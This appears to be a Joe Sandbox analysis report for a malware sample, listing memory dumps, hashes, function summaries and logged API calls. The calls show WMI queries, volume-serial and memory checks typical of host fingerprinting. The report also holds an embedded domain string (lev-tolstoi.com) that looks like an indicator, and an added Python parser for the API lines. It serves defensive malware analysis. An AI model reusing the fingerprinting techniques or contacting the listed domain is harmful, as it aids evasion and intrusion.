• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID:
• String ID: !@$,$8$9$?$Z$\$\$\$]$]$]$^$^$^$_$_$_$d$g$s
• API String ID: 0-1565257739
• Opcode ID: c2ed1bd8334f726353fda2de670280ebc7efb88cd23b9750e58c04cbbf17c230
• Instruction ID: ff3446387a4803cc10193d6b1e9fdac1030e4539fb3f22a2d73eb0600ead991b
• Opcode Fuzzy Hash: c2ed1bd8334f726353fda2de670280ebc7efb88cd23b9750e58c04cbbf17c230
• Instruction Fuzzy Hash: 0D228B7190C7808FD324DB28C485B6FBBE1AB86314F188D6EE4D987392D7B99845CB47

Control-flow Graph

• Executed
• Not Executed
control_flow_graph 497 9d9280-9d92a4 498 9d92b0-9d92d7 497->498 498->498 499 9d92d9-9d92ef 498->499 500 9d92f0-9d9322 499->500 500->500 501 9d9324-9d936a 500->501 502 9d9370-9d938c 501->502 502->502 503 9d938e-9d93a7 502->503 505 9d93ad-9d93b6 503->505 506 9d942a-9d9435 503->506 507 9d93c0-9d93d9 505->507 508 9d9440-9d947b 506->508 507->507 509 9d93db-9d93ee 507->509 508->508 510 9d947d-9d94de 508->510 511 9d93f0-9d941e 509->511 514 9d94e4-9d9515 510->514 515 9d9906-9d9932 call 9dfe00 GetVolumeInformationW 510->515 511->511 513 9d9420-9d9425 511->513 513->506 516 9d9520-9d954d 514->516 520 9d993c-9d993e 515->520 521 9d9934-9d9938 515->521 516->516 518 9d954f-9d9576 SysAllocString 516->518 524 9d957c-9d9596 CoSetProxyBlanket 518->524 525 9d98f5-9d9902 518->525 523 9d9950-9d9957 520->523 521->520 526 9d9959-9d9960 523->526 527 9d9970-9d998f 523->527 528 9d959c-9d95b4 524->528 529 9d98eb-9d98f1 524->529 525->515 526->527 530 9d9962-9d996e 526->530 531 9d9990-9d99b2 527->531 532 9d95c0-9d961e 528->532 529->525 530->527 531->531 533 9d99b4-9d99ca 531->533 535 9d9620-9d969f 532->535 536 9d99d0-9d9a06 533->536 541 9d96a0-9d96ff 535->541 536->536 537 9d9a08-9d9a2e call 9be960 536->537 542 9d9a30-9d9a37 537->542 541->541 543 9d9701-9d972d 541->543 542->542 544 9d9a39-9d9a4c 542->544 552 9d98d6-9d98e7 SysFreeString * 2 543->552 553 9d9733-9d9755 543->553 545 9d9940-9d994a 544->545 546 9d9a52-9d9a65 call 9a7fd0 544->546 545->523 549 9d9a6a-9d9a71 545->549 546->545 552->529 555 9d98cc-9d98d2 553->555 556 9d975b-9d975e 553->556 555->552 556->555 557 9d9764-9d9769 556->557 557->555 558 9d976f-9d97b7 557->558 560 9d97c0-9d97d4 558->560 560->560 561 9d97d6-9d97e0 560->561 562 9d97e4-9d97e6 561->562 563 9d97ec-9d97f2 562->563 564 9d98bb-9d98c8 562->564 563->564 565 9d97f8-9d9806 563->565 564->555 566 9d983d 565->566 567 9d9808-9d980d 565->567 570 9d983f-9d9877 call 9a7f50 call 9a8e10 566->570 569 9d981c-9d9820 567->569 571 9d9810 569->571 572 9d9822-9d982b 569->572 581 9d9879-9d988f 570->581 582 9d98a7-9d98b7 call 9a7f60 570->582 574 9d9811-9d981a 571->574 575 9d982d-9d9830 572->575 576 9d9832-9d9836 572->576 574->569 574->570 575->574 576->574 578 9d9838-9d983b 576->578 578->574 581->582 584 9d9891-9d989e 581->584 582->564 584->582 585 9d98a0-9d98a3 584->585 585->582
APIs
• SysAllocString.OLEAUT32(00001F7A), ref: 009D9551
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009D958F
• SysFreeString.OLEAUT32 ref: 009D98DF
• SysFreeString.OLEAUT32(?), ref: 009D98E5
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 009D992E
Note: the logged CoSetProxyBlanket arguments decode to dwAuthnSvc = 0xA (RPC_C_AUTHN_WINNT), dwAuthzSvc = 0 (RPC_C_AUTHZ_NONE), dwAuthnLevel = 3 (RPC_C_AUTHN_LEVEL_CALL), dwImpLevel = 3 (RPC_C_IMP_LEVEL_IMPERSONATE) and dwCapabilities = 0 (EOAC_NONE), which is the proxy security a WMI client sets on its IWbemServices proxy before issuing queries, consistent with the WMI-based checks listed in the signatures. In the GetVolumeInformationW call the only non-NULL output argument is lpVolumeSerialNumber (fourth parameter); the volume-name and file-system buffers are NULL, so the call retrieves just the volume serial number.
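The APIs block lists each call as `<api>.<module>(<logged arguments>), ref: <call site>`. The script below is an added example and not part of the Joe Sandbox report: it parses those lines into records, names the COM security constants CoSetProxyBlanket was called with, and reports which GetVolumeInformationW outputs were actually requested. The fixture is the five lines above copied as constructed input; the line pattern is an assumption about the report format, while the RPC_C_*/EOAC values and the Win32 parameter order are the documented Windows constants and signatures.

```python
"""Parse Joe Sandbox 'APIs' lines and decode two of the recorded calls.
Added example, not part of the Joe Sandbox report.  The fixture is the
APIs block for function 9D9280, copied here as constructed input."""
import re
from dataclasses import dataclass
from typing import Dict, List, Optional

# Constructed fixture: the APIs block for 9D9280 as printed in the report.
SAMPLE_API_LINES = """\
• SysAllocString.OLEAUT32(00001F7A), ref: 009D9551
• CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 009D958F
• SysFreeString.OLEAUT32 ref: 009D98DF
• SysFreeString.OLEAUT32(?), ref: 009D98E5
• GetVolumeInformationW.KERNELBASE(?,00000000,00000000,00001F7A,00000000,00000000,00000000,00000000), ref: 009D992E
"""

# "<api>.<module>(<hex args>), ref: <hex call site>".  The argument list is
# absent when the logger captured none; '?' marks a value it could not resolve.
API_LINE = re.compile(
    r"^\W*(?P<api>\w+)\.(?P<module>\w+)"
    r"(?:\((?P<args>[^)]*)\))?"
    r"\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)$"
)


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[Optional[int]]   # None where the report shows '?'
    ref: int                    # address of the call instruction


def _arg(tok: str) -> Optional[int]:
    tok = tok.strip()
    return None if tok in ("", "?") else int(tok, 16)


def parse_api_lines(text: str) -> List[ApiCall]:
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line.strip())
        if not m:
            continue                      # headings and notes are skipped
        raw = m.group("args")
        args = [_arg(a) for a in raw.split(",")] if raw is not None else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args,
                             int(m.group("ref"), 16)))
    return calls


# Win32 constants used by CoSetProxyBlanket (rpcdce.h / objidl.h values).
RPC_C_AUTHN = {0: "RPC_C_AUTHN_NONE", 9: "RPC_C_AUTHN_GSS_NEGOTIATE",
               10: "RPC_C_AUTHN_WINNT", 16: "RPC_C_AUTHN_GSS_KERBEROS",
               0xFFFFFFFF: "RPC_C_AUTHN_DEFAULT"}
RPC_C_AUTHZ = {0: "RPC_C_AUTHZ_NONE", 1: "RPC_C_AUTHZ_NAME",
               2: "RPC_C_AUTHZ_DCE", 0xFFFFFFFF: "RPC_C_AUTHZ_DEFAULT"}
RPC_C_AUTHN_LEVEL = {0: "RPC_C_AUTHN_LEVEL_DEFAULT", 1: "RPC_C_AUTHN_LEVEL_NONE",
                     2: "RPC_C_AUTHN_LEVEL_CONNECT", 3: "RPC_C_AUTHN_LEVEL_CALL",
                     4: "RPC_C_AUTHN_LEVEL_PKT", 5: "RPC_C_AUTHN_LEVEL_PKT_INTEGRITY",
                     6: "RPC_C_AUTHN_LEVEL_PKT_PRIVACY"}
RPC_C_IMP_LEVEL = {0: "RPC_C_IMP_LEVEL_DEFAULT", 1: "RPC_C_IMP_LEVEL_ANONYMOUS",
                   2: "RPC_C_IMP_LEVEL_IDENTIFY", 3: "RPC_C_IMP_LEVEL_IMPERSONATE",
                   4: "RPC_C_IMP_LEVEL_DELEGATE"}


def _name(table: Dict[int, str], value: Optional[int]) -> str:
    return "?" if value is None else table.get(value, hex(value))


def decode_proxy_blanket(call: ApiCall) -> Optional[Dict[str, str]]:
    """Name the numeric CoSetProxyBlanket arguments; None for other calls.
    Parameter order: pProxy, dwAuthnSvc, dwAuthzSvc, pServerPrincName,
    dwAuthnLevel, dwImpLevel, pAuthInfo, dwCapabilities."""
    if call.api != "CoSetProxyBlanket" or len(call.args) != 8:
        return None
    _, authn, authz, _, level, imp, _, caps = call.args
    return {"dwAuthnSvc": _name(RPC_C_AUTHN, authn),
            "dwAuthzSvc": _name(RPC_C_AUTHZ, authz),
            "dwAuthnLevel": _name(RPC_C_AUTHN_LEVEL, level),
            "dwImpLevel": _name(RPC_C_IMP_LEVEL, imp),
            "dwCapabilities": "EOAC_NONE" if caps == 0 else _name({}, caps)}


# Output pointers of GetVolumeInformationW by position; index 0 is the
# input lpRootPathName and indices 2 and 7 are buffer sizes, not pointers.
VOLUME_INFO_OUTPUTS = {1: "lpVolumeNameBuffer", 3: "lpVolumeSerialNumber",
                       4: "lpMaximumComponentLength", 5: "lpFileSystemFlags",
                       6: "lpFileSystemNameBuffer"}


def volume_info_requested(call: ApiCall) -> Optional[List[str]]:
    """GetVolumeInformationW outputs given a non-NULL pointer.  A value the
    logger could not resolve ('?') is conservatively treated as NULL."""
    if call.api != "GetVolumeInformationW" or len(call.args) != 8:
        return None
    return [n for i, n in VOLUME_INFO_OUTPUTS.items() if call.args[i] not in (None, 0)]
```

On the fixture, `decode_proxy_blanket` returns WINNT / NONE / LEVEL_CALL / IMPERSONATE / EOAC_NONE for the second line and `volume_info_requested` returns only `lpVolumeSerialNumber` for the last one, which is what the two calls in this function ask the system for.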
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: String$Free$AllocBlanketInformationProxyVolume
                                                                                                                                                                                                                                  • String ID: :;$%$=hn$Jtuj$O^$SB$b{tu$gd$t"j
                                                                                                                                                                                                                                  • API String ID: 1773362589-1335595022
                                                                                                                                                                                                                                  • Opcode ID: f5ce40dbcd51953b72315ee2da8e76620a0b5064f5ea8a9d24f8d502ee3b57ca
                                                                                                                                                                                                                                  • Instruction ID: 3e0f54c261b5c042ab9bb3d27abb4d82862023e9a1a8e7719dc38fb0e97568c2
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f5ce40dbcd51953b72315ee2da8e76620a0b5064f5ea8a9d24f8d502ee3b57ca
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6224172A483419BD310DF28C880B5BBBE6EFC5714F18C92DE9949B3A1D775D841CB82

Control-flow Graph
• Function at 9ab100 (basic blocks 9ab100-9ab7a9; calls 9a7e30, 9dfe00, 9de0a0). The rendered graph and its executed/not-executed colouring are not reproduced in this export.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID:
• String ID: (Y6[$.AtC$9]_$D!M#$Gq\s$Gu@w$S%U'$XyR{$Ym]o$b6j4$hI2K$k=W?$pE}G$yQrS$zMzO
• API String ID: 0-620192811
• Opcode ID: 295277e7a73b3a7ecd703f7ee76c7e14709795ee21be7544395bd0efa1f4f213
• Instruction ID: 82c56543865aaa47048400fff3370f473ae00ed4157b33bdf43f3ca6791ae132
• Opcode Fuzzy Hash: 295277e7a73b3a7ecd703f7ee76c7e14709795ee21be7544395bd0efa1f4f213
• Instruction Fuzzy Hash: DC0267B1114B41CFD724CF25D891B9BBBF1FB45314F018A2CD5AA8BAA1D734A844DF90

Control-flow Graph
• Function at 9b1227 (basic blocks 9b1227-9b2744; calls 9a1870, 9b4850, 9a1f30, 9a7f50, 9aa8d0, 9a7f60, 9a1b80, 9a1a80, 9a8b60, 9b57c0, 9a9780, 9b4980, 9a1f40, 9b4b10, 9a8c40, 9b49a0 and RtlExpandEnvironmentStrings). The rendered graph and its executed/not-executed colouring are not reproduced in this export.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID:
• String ID: )$+$>$@$F$L$[$`
• API String ID: 0-4163809010
• Opcode ID: d05ed21dae8b5c736380831899518d6525db0c149316c87c83cb3363d6787bac
• Instruction ID: 17f660dd5f8b8f88ee62c55244a54a09af2be470c4944937bc6119e757318e41
• Opcode Fuzzy Hash: d05ed21dae8b5c736380831899518d6525db0c149316c87c83cb3363d6787bac
• Instruction Fuzzy Hash: 58528F7260C7808FD3249B38C5953EFBBE1ABD6320F594A2EE4D9C7391D67889458B43

Control-flow Graph
• Function at 9d8ea0 (basic blocks 9d8ea0-9d9271; calls 9de110). The rendered graph and its executed/not-executed colouring are not reproduced in this export.
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID:
• String ID: \$\$\$]$]$]$^$^$^$_$_$_
• API String ID: 0-1108506012
• Opcode ID: 26fc2d38e390254bda215354504ce2628c5bdc6537bcdd1988bd14e5babf4bc3
• Instruction ID: 8e6b3ccbf66eb86ec86d3700fae5110278f4929be66a59086a0736ee137d4ea5
• Opcode Fuzzy Hash: 26fc2d38e390254bda215354504ce2628c5bdc6537bcdd1988bd14e5babf4bc3
• Instruction Fuzzy Hash: 9BB1287168C3818FD3149A28CC8436BBFD297D6324F1D8B1EE5E9473D2C6B9C8858746

Control-flow Graph
APIs
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: Uninitialize
• String ID: 6=.)$<1!9$`{tu$lev-tolstoi.com
• API String ID: 3861434553-1386727196
• Opcode ID: 983d4131ee9a84aca49d2732a02f63308786cebb5e8d8f3639cbb5727e09bd11
• Instruction ID: 41b050099873ab42eb195c7658197b1fc6b87f4d1394b4b17d794510f342508a
• Opcode Fuzzy Hash: 983d4131ee9a84aca49d2732a02f63308786cebb5e8d8f3639cbb5727e09bd11
• Instruction Fuzzy Hash: 93A1F1B42057818FD716CF29C4D0662BBE2FF97314B18859CC4D24F76AD735A846CB91

Control-flow Graph
APIs
• ExitProcess.KERNEL32(00000000), ref: 009A8A4A
  • Part of subcall function 009AB7B0: FreeLibrary.KERNEL32(009A8A31), ref: 009AB7B6
  • Part of subcall function 009AB7B0: FreeLibrary.KERNEL32 ref: 009AB7D7
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
Similarity
• API ID: FreeLibrary$ExitProcess
• String ID: b]u)$}$}
• API String ID: 1614911148-2900034282
• Opcode ID: 7a0b3ac3d5ff76d1dd9272aca4aff8bc2686427cce6de778cb2a569f21c1ae71
• Instruction ID: 12a2bad3840404c31d0df0fb1d5505058906d8f50af3f75104808cfcad84457b
• Opcode Fuzzy Hash: 7a0b3ac3d5ff76d1dd9272aca4aff8bc2686427cce6de778cb2a569f21c1ae71
• Instruction Fuzzy Hash: EBC1E573E187144BC718DF69C84125AF7D6ABC8710F0AC52EA898EB391EA74DD058BC2

Control-flow Graph
APIs
• GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 009CD3EE
Strings
Memory Dump Source
• Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
• Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InstalledMemoryPhysicallySystem
                                                                                                                                                                                                                                  • String ID: ><+
                                                                                                                                                                                                                                  • API String ID: 3960555810-2918635699
                                                                                                                                                                                                                                  • Opcode ID: 55c978604cbf5477ddca047777558a9d3a99e4c0ecb51f851079b32c8963ed19
                                                                                                                                                                                                                                  • Instruction ID: 42fc1e986dea4b4e980d7c423c1cfcb1c93bedea7ba3b953f724b6b116415562
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 55c978604cbf5477ddca047777558a9d3a99e4c0ecb51f851079b32c8963ed19
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 18C10575A057818FD725CF29C490722FBE2BF96310F1885ADD4DA8B752C735E802CB51
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: InitializeThunk
                                                                                                                                                                                                                                  • String ID: @Ukx$
                                                                                                                                                                                                                                  • API String ID: 2994545307-3636270652
                                                                                                                                                                                                                                  • Opcode ID: 241931c674dd8e06f503a9c560067dbf7f281d66efc377b9e1a3f69fc14e228c
                                                                                                                                                                                                                                  • Instruction ID: 1211b336019dd2535c403fa2124f56d3cc657ef16e465ec6cdf48fec12a2a14b
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 241931c674dd8e06f503a9c560067dbf7f281d66efc377b9e1a3f69fc14e228c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: D0B17632B083904BC729CE29DCD12BFB7A6EBC5314F19C93CD9865B395CA75AC458781
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 00000000.00000002.2287681571.00000000009A1000.00000040.00000001.01000000.00000003.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287663496.00000000009A0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287681571.00000000009E5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287794609.00000000009F3000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.00000000009F5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000B78000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C50000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C7C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C83000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2287815249.0000000000C92000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288212027.0000000000C93000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288375348.0000000000E2C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  • Associated: 00000000.00000002.2288393848.0000000000E2D000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_9a0000_MaZjv5XeQi.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                  • String ID: A8DE765A6B6DDD2BBEBA0C6A975F1733
                                                                                                                                                                                                                                  • API String ID: 0-1420259744
                                                                                                                                                                                                                                  • Opcode ID: 02c1eb94a0ded23ac00f3cc6fa68520bd44b75666c8b4fd62864d1d8d840c2a0
                                                                                                                                                                                                                                  • Instruction ID: 26b307196f839b0b9b013bac3a3a7b4abfe3819bcd74dbd609446d1520e8b971
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 02c1eb94a0ded23ac00f3cc6fa68520bd44b75666c8b4fd62864d1d8d840c2a0
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: CD8129756407418BD3258B38CC927A7B7E2EFDB315F1DC96CD4869B347E638A80287A0
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • LdrInitializeThunk.NTDLL(009E148A,00FFC960,00000018,?,?,00000018,?,?,?), ref: 009DE13E
                                                                                                                                                                                                                                  Memory Dump Source
